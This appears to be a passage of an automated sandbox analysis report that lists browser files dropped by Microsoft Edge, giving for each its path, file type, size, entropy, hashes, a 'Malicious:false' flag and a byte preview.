                                                                                                                                                            MD5:7C982094C637BB3615B4807BB1CB4264
                                                                                                                                                            SHA1:9B8A8B0F24D549E5FABB299B2ACE1C3A891D91C2
                                                                                                                                                            SHA-256:3C0081CB12875F3C26654C2CADC78B80A3F84D807DADF3FB5954499A7D94759B
                                                                                                                                                            SHA-512:F80D40B7592D7AC79C0784C9C25B0A3D91BDC2B1A4BD004094C3C2CD898709CB5232073899ABDF65E61F1074BFB6922F1D5F73AA2105C57B263BCBF30E6EFB25
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:@...0Jt>oy retne.........................X....,...................../.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):72
                                                                                                                                                            Entropy (8bit):3.565412423760729
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:FvzX00Xl/l7n/lxEstllTIXx:NXjEsuB
                                                                                                                                                            MD5:7C982094C637BB3615B4807BB1CB4264
                                                                                                                                                            SHA1:9B8A8B0F24D549E5FABB299B2ACE1C3A891D91C2
                                                                                                                                                            SHA-256:3C0081CB12875F3C26654C2CADC78B80A3F84D807DADF3FB5954499A7D94759B
                                                                                                                                                            SHA-512:F80D40B7592D7AC79C0784C9C25B0A3D91BDC2B1A4BD004094C3C2CD898709CB5232073899ABDF65E61F1074BFB6922F1D5F73AA2105C57B263BCBF30E6EFB25
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:@...0Jt>oy retne.........................X....,...................../.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF3ed4f.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):72
                                                                                                                                                            Entropy (8bit):3.565412423760729
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:FvzX00Xl/l7n/lxEstllTIXx:NXjEsuB
                                                                                                                                                            MD5:7C982094C637BB3615B4807BB1CB4264
                                                                                                                                                            SHA1:9B8A8B0F24D549E5FABB299B2ACE1C3A891D91C2
                                                                                                                                                            SHA-256:3C0081CB12875F3C26654C2CADC78B80A3F84D807DADF3FB5954499A7D94759B
                                                                                                                                                            SHA-512:F80D40B7592D7AC79C0784C9C25B0A3D91BDC2B1A4BD004094C3C2CD898709CB5232073899ABDF65E61F1074BFB6922F1D5F73AA2105C57B263BCBF30E6EFB25
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:@...0Jt>oy retne.........................X....,...................../.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6139
                                                                                                                                                            Entropy (8bit):3.3888908088335694
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:cc9XmI0sorZH9Xp+mt+VijwLl9iSrl1LQyn6LSYQkjARAMAH8Alkgs4NC:cEmIQd9Xp+YKicLl9iSrlpTnrYQNgm
                                                                                                                                                            MD5:33A0805E50BEDCF97B244766CCB7B72F
                                                                                                                                                            SHA1:03DA3830BD190EDC8614141E9B912FE4B2D0EC2B
                                                                                                                                                            SHA-256:18230CD853BD97B907C1856652BB05F17A1AEAABAA9E63D71FBAAEB0E5B577AA
                                                                                                                                                            SHA-512:C9B2DE4E4D03C64BEDD80A8AF2758E66CBE5F349EAB47E4A9014E16541AED10AB9367497C4D6ED0DE3F4E3BCDA3217E70B6ADD95DB52B45AC7E50411F2DC4809
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f................!Q.b................next-map-id.1.Cnamespace-a258241b_0a3a_4fe7_a6d6_b133ebce50c0-https://ntp.msn.com/.0..pj.................map-0-shd_sweeper.,{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.c.,.c.-.p.r.g.-.m.s.n.-.s.b.i.d.m.,.p.n.p.w.x.e.x.p.i.r.e.6.0.,.b.i.n.g._.v.2._.s.c.o.p.e.,.p.r.g.-.1.s.w.-.s.a.g.e.i.m.a.n.n.i.2.c.,.p.r.g.-.1.s.w.-.c.-.r.p.d.l.a.u.n.c.h.,.1.s.-.w.p.o.-.p.r.1.-.c.t.t.u.,.p.r.g.-.f.i.n.-.c.l.e.f.t.r.a.,.r.o.u.t.e.a.u.t.h.e.x.p.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.p.r.g.-.p.r.2.-.m.a.r.k.e.t.s.e.l.-.t.,.1.s.-.p.2.-.i.g.n.o.r.e.c.m.,.p.r.g.-.p.r.2.-.m.a.r.k.e.t.s.e.l.,.b.t.i.e.-.a.d.-.c.t.a.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):322
                                                                                                                                                            Entropy (8bit):5.136978716412371
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/zubq2Pwkn23oH+TcwtrQMxIFUtNWDZmwznZkwOwkn23oH+TcwtrQMFLJ:7/z8vYfYebCFUtNa/znZ5JfYebtJ
                                                                                                                                                            MD5:6E24668D978AC10972894753FFDFDA4C
                                                                                                                                                            SHA1:C3D99A2E577C1C1E93C88961F73E95F3EB8BB1CB
                                                                                                                                                            SHA-256:B9D700A6BD5AC1E7DC11CC04F5807489AFBF389C886CB371798580083A60ECAF
                                                                                                                                                            SHA-512:9C3C93E4E885DF9235F124E2BF069D77C20805A22880770CEF56078710A39EEE510B551594A8B354EA5405551C697709494504B65D2613637B0A10B06E65BDAD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:59.188 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/06-17:04:59.189 10e0 Recovering log #3.2025/01/06-17:04:59.216 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):322
                                                                                                                                                            Entropy (8bit):5.136978716412371
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/zubq2Pwkn23oH+TcwtrQMxIFUtNWDZmwznZkwOwkn23oH+TcwtrQMFLJ:7/z8vYfYebCFUtNa/znZ5JfYebtJ
                                                                                                                                                            MD5:6E24668D978AC10972894753FFDFDA4C
                                                                                                                                                            SHA1:C3D99A2E577C1C1E93C88961F73E95F3EB8BB1CB
                                                                                                                                                            SHA-256:B9D700A6BD5AC1E7DC11CC04F5807489AFBF389C886CB371798580083A60ECAF
                                                                                                                                                            SHA-512:9C3C93E4E885DF9235F124E2BF069D77C20805A22880770CEF56078710A39EEE510B551594A8B354EA5405551C697709494504B65D2613637B0A10B06E65BDAD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:59.188 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/06-17:04:59.189 10e0 Recovering log #3.2025/01/06-17:04:59.216 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13380674700827258

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1443
                                                                                                                                                            Entropy (8bit):3.823943655620176
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:3bzQPoeTUpsAF4unxCtLp3X2amEtG1Chq2OEZvVnPQKkOAM4:3bMQOUzFkLp2FEkChgaNnoHOp
                                                                                                                                                            MD5:3D1A2BF4F2933FD4073BDE920BCEB98D
                                                                                                                                                            SHA1:9C60A389ED6FD6E5164BDFA21D9EDAF4CC6B8A63
                                                                                                                                                            SHA-256:13C846CEEE557C73EDDA93F35C5E6F306FC905EF3C882DC6BE831BA3E9B5736C
                                                                                                                                                            SHA-512:26A95DACC6FA7981E713C470E82572FC9E652017DAA30E22814A7B4B1B38AD0AC7EF2D1449486D08A4795296326FA434A2BFFCD5217098848AB47C8CAA53BA08
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SNSS..........O..............O......"...O..............O..........O..........O..........O....!.....O..................................O...O1..,......O$...a258241b_0a3a_4fe7_a6d6_b133ebce50c0......O..........O.....F............O......O..........................O..........................O....................5..0......O&...{1A5CCF63-1000-409F-B5C1-AFEC7F75D4D9}........O.............O..............O........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........;...+...;...+.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):20480
                                                                                                                                                            Entropy (8bit):0.44194574462308833
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                            MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                            SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                            SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                            SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):347
                                                                                                                                                            Entropy (8bit):5.151311210859333
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/MOq2Pwkn23oH+Tcwt7Uh2ghZIFUtN6YXZmwz6YFkwOwkn23oH+Tcwt7Uh2gnd:7/9vYfYebIhHh2FUtNV/zH5JfYebIhHd
                                                                                                                                                            MD5:CAD30E8F294E5307A408DAA5853E479A
                                                                                                                                                            SHA1:E9E7267FFD443A30FBE9A16A84C3E2EF63E49890
                                                                                                                                                            SHA-256:8C423576E85517724C73C35989453C957AA9D4497B151E9EB15EDD78D07E6EA9
                                                                                                                                                            SHA-512:0E843D3D0A084FD50694F98C2B28C77B85D7C5BCE46045C6572C424DB02310E4903EDA1CD9A73867150B263AE6937686D9E7C899F2A90B9CC70E17003A2B9DC4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.552 ab0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/06-17:04:58.553 ab0 Recovering log #3.2025/01/06-17:04:58.553 ab0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):347
                                                                                                                                                            Entropy (8bit):5.151311210859333
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/MOq2Pwkn23oH+Tcwt7Uh2ghZIFUtN6YXZmwz6YFkwOwkn23oH+Tcwt7Uh2gnd:7/9vYfYebIhHh2FUtNV/zH5JfYebIhHd
                                                                                                                                                            MD5:CAD30E8F294E5307A408DAA5853E479A
                                                                                                                                                            SHA1:E9E7267FFD443A30FBE9A16A84C3E2EF63E49890
                                                                                                                                                            SHA-256:8C423576E85517724C73C35989453C957AA9D4497B151E9EB15EDD78D07E6EA9
                                                                                                                                                            SHA-512:0E843D3D0A084FD50694F98C2B28C77B85D7C5BCE46045C6572C424DB02310E4903EDA1CD9A73867150B263AE6937686D9E7C899F2A90B9CC70E17003A2B9DC4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.552 ab0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/06-17:04:58.553 ab0 Recovering log #3.2025/01/06-17:04:58.553 ab0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_0

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):8.280239615765425E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                            MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                            SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                            SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                            SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_2

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_3

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\index

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):524656
                                                                                                                                                            Entropy (8bit):5.027445846313988E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:LsulJ/S:Ls
                                                                                                                                                            MD5:1E8D8397AA99C134C16B522D9006056E
                                                                                                                                                            SHA1:43D8C3D137DC840B0EE20AF709A494A8EDA2B9E7
                                                                                                                                                            SHA-256:88A9FFCB17AF3C2D2475D440177323D5BDF07A0BED2328095BD5EB34E402C945
                                                                                                                                                            SHA-512:2D67BD14345936807399D9DE2E9FDA7D6AEB4419AFF205562D72F339DF68EA5F666A9F4B30F9BAD883D2DD47F2EDEA09B19D688F62C00FFFEA4B160AE3B11F36
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.........................................H..../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_0

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_2

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_3

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\index

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):262512
                                                                                                                                                            Entropy (8bit):9.553120663130604E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:LsNl8Ks+l:Ls3vl
                                                                                                                                                            MD5:73EE9435FA28ACE19DB525BD7EAC78F7
                                                                                                                                                            SHA1:017AEB300A0F36C15B316FDF7208407CDA2E962B
                                                                                                                                                            SHA-256:A319213761659954E5B16834F404C83F5945A07DDCD0664154143E1F01AE0662
                                                                                                                                                            SHA-512:8EFDA733B625F9F319C576B9C7CB7BB0BE5385D318C52BE86C9183C67DBF1B7AA0645426EF88D8923EF33029635CC03D49E64F751E32C660C53BD11A6758F8D2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................k.M.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):432
                                                                                                                                                            Entropy (8bit):5.2311617054034425
                                                                                                                                                            Encrypted:false
